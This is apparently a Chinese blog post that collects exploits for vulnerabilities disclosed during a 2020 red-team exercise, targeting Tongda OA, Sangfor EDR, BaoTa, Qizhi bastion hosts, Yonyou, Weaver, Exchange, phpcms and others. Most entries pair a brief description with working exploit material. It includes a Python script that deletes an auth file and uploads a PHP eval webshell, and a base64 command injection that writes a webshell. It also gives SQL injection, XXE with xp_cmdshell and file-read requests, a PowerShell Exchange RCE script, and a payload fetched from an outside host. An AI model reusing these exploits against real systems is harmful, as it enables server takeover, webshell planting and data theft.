2020HW 0day合集

HW期间陆续爆出了许多漏洞,对影响比较大的漏洞进行了归纳整理,漏洞详情如下:

通达OA远程代码执行漏洞

通达OA <v11.5&v11.6 版本存在远程代码执行漏洞,该漏洞主要由 文件删除漏洞,结合 后台文件上传漏洞 造成。攻击者可通过文件删除漏洞将身份验证文件删除,从而进行未授权恶意文件上传,最终获取服务器系统权限。

exp

target="http://127.0.0.1:1234/"
payload="<?php eval($_POST['hahaha']);?>"
print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA")
input("Press enter to continue")
print("[*]Deleting auth.inc.php....")
url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"
requests.get(url=url)
print("[*]Checking if file deleted...")
url=target+"/inc/auth.inc.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:
    print("[-]Failed to deleted auth.inc.php")
    exit(-1)
print("[+]Successfully deleted auth.inc.php!")
print("[*]Uploading payload...")
url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"
files = {'FILE1': ('deconf.php', payload)}
requests.post(url=url,files=files)
url=target+"/_deconf.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:
    print("[+]Filed Uploaded Successfully")
    print("[+]URL:",url)
else:
    print("[-]Failed to upload file")

深信服EDR远程命令执行漏洞

深信服EDR特定版本(3.2.16、3.2.17、3.2.19)存在远程命令执行漏洞,攻击者可利用该漏洞发送精心构造的 HTTP 请求,实现远程命令执行,获得目标服务器的权限。

payload

https://IP/tool/log/c.php?strip_slashes=system&host=id

深信服EDR任意用户登录漏洞

深信服EDR特定版本(3.2.16、3.2.17、3.2.19)存在任意用户登录漏洞,攻击者可利用该漏洞绕过身份认证限制,登录终端检测响应平台。
payload
https://IP/ui/login.php?user=admin

宝塔面板未授权访问漏洞

宝塔面板特定版本(Linux面板7.4.2、Windows面板6.8)存在未授权访问漏洞,攻击者可利用该漏洞访问,直接绕过身份认证限制,登录phpMyAdmin。

payload

https://IP:888/pma

通达OA后台多处SQL注入漏洞

通达OA <V11.6 版本存在多处SQL注入漏洞,攻击者以 普通用户登录 后,可通过发送精心构造的SQL语句,获取数据库敏感数据、执行恶意SQL语句。

漏洞接口


/general/appbuilder/web/calendar/calendarlist/getcallist
/general/email/sentbox/get_index_data.php
/general/email/inbox/get_index_data.php
/general/appbuilder/web/report/repdetail/edit

exp

齐治堡垒机前台远程命令执行漏洞

齐治运维堡垒机服务端存在命令执行漏洞,攻击者 无需登录 即可利用该漏洞发送精心构造的 HTTP 请求,实现远程命令执行。

利用方式

访问 http://ip/listener/cluster_manage.php :返回 “OK”.
访问如下链接即可getshell,执行成功后,生成PHP一句话马
https://ip/ha_request.php?action=install&ipaddr=ip&node_id=1${IFS}|`echo${IFS}" ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base64${IFS}- d|bash`|${IFS}|echo${IFS}
/var/www/shterm/resources/qrcode/lbj77.php 密码10086

天融信TopApp-LB负载均衡系统SQL注入漏洞

天融信TopApp-LB负载均衡系统存在SQL注入漏洞,攻击者可通过发送精心构造的SQL语句,获取数据库敏感数据、执行恶意SQL语句。

poc


POST /acc/clsf/report/datasource.php HTTP/1.1
Host:
Connection: close
Accept: text/javascript, text/html, application/xml, text/xml, */*
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ijqtopbcbmu8d70o5t3kmvgt57
Content-Type: application/x-www-form-urlencoded
Content-Length: 201

t=l&e=0&s=t&l=1&vid=1+union select 1,2,3,4,5,6,7,8,9,substr('a',1,1),11,12,13,14,15,16,17,18,19,20,21,22--+&gid=0&lmt=10&o=r_Speed&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=@ ......

用友GRP-u8 XXE漏洞

用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析 XML 输入时没有禁止外部实体的加载,导致可加载恶意外部文件。

poc

POST /Proxy HTTP/1.1
Accept: Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)
Host: host
Content-Length: 357
Connection: Keep-Alive
Cache-Control: no-cache

cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'net user'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>

绿盟UTS综合威胁探针管理员任意登录漏洞

绿盟UTS存在任意管理员登录漏洞,攻击者可利用该漏洞对 响应包 进行修改,将false更改为true的时候可以泄露管理用户的 md5值密码。

利用方式

修改登录数据包 {"status":false,"mag":""} -> {"status":true,"mag":""
/webapi/v1/system/accountmanage/account接口逻辑错误泄漏了管理员的账户信息包括密码(md5)
再次登录,替换密码上个数据包中md5密码。
登录成功

天融信数据防泄漏系统越权修改管理员密码漏洞

天融信数据防泄漏系统存在越权修改管理员密码漏洞,该漏洞源于修改密码处未校验原密码,且/?module=auth_user&action=mod_edit_pwd接口未授权访问,攻击者 无需登录权限 即可直接修改任意用户密码。

exp

POST /?module=auth_user&action=mod_edit_pwd
Cookie: username=superman;
uid=1&pd=Newpasswd&mod_pwd=1&dlp_perm=1

泛微OA云桥任意文件读取漏洞

泛微0A云桥任意文件读取漏洞源于 /wxjsapi/saveYZJFile 接口获取 filepath 返回数据包内出现了程序的 绝对路径,攻击者可利用此漏洞通过返回内容识别程序运行路径从而读取任意文件。

exp

GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt HTTP/1.1 
User-Agent: curl/7.29.0 
Host: xxxxx 
Accept: */*

Exchange Server 远程代码执行漏洞

该漏洞源于 Microsoft Exchange 服务器对 cmdlet参数 不正确的验证。攻击者只需要一个Exchange用户账号,即可通过在受影响的 Exchange 服务器上构造特殊的 cmdlet参数 即可触发该漏洞,造成以系统最高权限(System权限)执行任意代码的影响。

exp


# Example:
# PS C:\Users\researcher> .\poc.ps1 -server WIN-0K4AOM2JIN6.exchangedemo.com -usr harrym@exchangedemo.com -pwd user123### -cmd mspaint
# (+) targeting WIN-0K4AOM2JIN6.exchangedemo.com with harrym@exchangedemo.com:user123###
# (+) executed mspaint as SYSTEM!
# PS C:\Users\researcher>

param (
    [Parameter(Mandatory=$true)][string]$server,
    [Parameter(Mandatory=$true)][string]$usr,
    [Parameter(Mandatory=$true)][string]$pwd,
    [string]$cmd = "mspaint"
)

Function Get-RandomAlphanumericString {
    [CmdletBinding()]
    Param (
        [int] $length = 8
    )
    Process{
        Write-Output ( -join ((0x30..0x39) + ( 0x41..0x5A) + ( 0x61..0x7A) | Get-Random -Count $length  | % {[char]$_}) )
    }  
}

function Exploit-Exchange {
    Param (
        [string] $server,
        [string] $usr,
        [string] $pwd,
        [string] $cmd
    )
    "(+) targeting $server with ${usr}:$pwd"
    $securepwd = ConvertTo-SecureString $pwd -AsPlainText -Force
    $creds = New-Object System.Management.Automation.PSCredential -ArgumentList ($usr, $securepwd)
    $s = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri http://$server/PowerShell/ -Authentication Kerberos -Credential $creds

    $xml = @"
<dlpPolicyTemplates>
  <dlpPolicyTemplate id="F7C29AEC-A52D-4502-9670-141424A83FAB" mode="Audit" state="Enabled" version="15.0.2.0">
    <contentVersion>4</contentVersion>
    <publisherName>s</publisherName>
    <name>
      <localizedString lang="en"></localizedString>
    </name>
    <description>
      <localizedString lang="en"></localizedString>
    </description>
    <keywords></keywords>
    <ruleParameters></ruleParameters>
    <policyCommands>
      <commandBlock>
        <![CDATA[ `$i=New-object System.Diagnostics.ProcessStartInfo;`$i.UseShellExecute=`$true;`$i.FileName="cmd";`$i.Arguments="/c $cmd";`$r=New-Object System.Diagnostics.Process;`$r.StartInfo=`$i;`$r.Start() ]]>
      </commandBlock>
    </policyCommands>
    <policyCommandsResources></policyCommandsResources>
  </dlpPolicyTemplate>
</dlpPolicyTemplates>
"@

    $n = Get-RandomAlphanumericString
    [Byte[]]$d = [System.Text.Encoding]::UTF8.GetBytes($xml)
    Invoke-Command -Session $s -ScriptBlock {
        New-DlpPolicy -Name $Using:n -TemplateData $Using:d 
    } | Out-Null
    "(+) executed $cmd as SYSTEM!"  
}

Get-PSSession | Remove-PSSession
Exploit-Exchange -server $server -usr $usr -pwd $pwd -cmd $cmd

深信服EDR 3.2.21 远程命令执行漏洞

深信服EDR 3.2.21 存在任意代码执行漏洞,攻击者可利用该漏洞发送精心构造的HTTP请求,实现远程代码执行。

exp

{"params":"w=123\"'1234123'\"|命令"}

联软科技产品任意文件上传漏洞

任意文件上传漏洞源于后台使用 黑名单 机制对用户上传的 自检报告文件 进行过滤和限制,由于当前黑名单机制存在缺陷,导致存在文件上传漏洞,攻击者利用该漏洞可以获取webshell权限。

exp

联软科技产品命令执行漏洞

命令执行漏洞源于 后台资源读取 过程中,对于自动提交的用户可控参数没有进行安全检查,导致直接执行了提交数据包中特殊构造的命令参数,造成命令执行漏洞。该漏洞能够以当前运行的中间件用户权限执行系统命令,根据中间件用户权限不同,可以进行添加系统账户,使用反弹shell等操作。

exp

WPS命令执行漏洞

WPS Office 11.2.0.9453版本 存在一个远程执行代码漏洞,该漏洞源是Office软件在分析特制Office文件时不正确地处理内存中的对象时引起的。成功利用此漏洞的攻击者可以在当前用户的上下文中运行任意代码,故障可能会导致拒绝服务。

exp

phpcms V9 前台RCE漏洞

phpcms v9全版本 存在任意代码执行漏洞,攻击者可利用该漏洞发送精心构造的HTTP请求,实现远程代码执行。

poc

POST /index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1
Host: 192.168.87.128
Content-Length: 297
Cache-Control: max-age=0
Origin: http://192.168.87.128
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,p_w_picpath/webp,*/*;q=0.8
Referer: http://192.168.87.128/index.php?m=member&c=index&a=register&siteid=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,es;q=0.6,fr;q=0.4,vi;q=0.2
Cookie: PHPSESSID=h6jo0216vveqr9blnh246tq5q5
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Originating-IP: 127.0.0.1
Connection: close

siteid=1&modelid=2&username=test&password=test123&pwdconfirm=test123&email=test%40qq.com&nickname=test233&dosubmit=%E5%90%8C%E6%84%8F%E6%B3%A8%E5%86%8C%E5%8D%8F%E8%AE%AE%EF%BC%8C%E6%8F%90%E4%BA%A4%E6%B3%A8%E5%86%8C&protocol=&info[content]=<img src=http://www.xingkonglangzi.com/test.txt?.php#.jpg>
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇